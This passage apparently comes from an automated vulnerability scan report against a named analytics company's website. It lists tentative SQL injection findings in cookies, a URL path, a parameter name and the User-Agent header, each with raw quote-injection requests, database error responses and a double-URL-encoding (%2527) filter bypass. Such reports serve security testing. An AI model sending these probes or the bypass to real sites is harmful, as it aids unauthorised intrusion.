HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:22:14 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:22:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:23:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:23:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:23:41 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:23:41 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:14:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:14:15 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:17:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:17:41 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:17:43 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:17:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.15. http://www.analyticspros.com/blog/55-googleanalytics/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/blog/55-googleanalytics/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/?1%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:21:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/?1%2527%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:21:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:21:48 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:21:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28549
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:18:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:18:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:18:32 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:18:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog%2527/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 06:51:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 06:51:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /blog%2527%2527/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:51:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527 Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:57 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527 Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:52:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937'; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:44:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937''; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
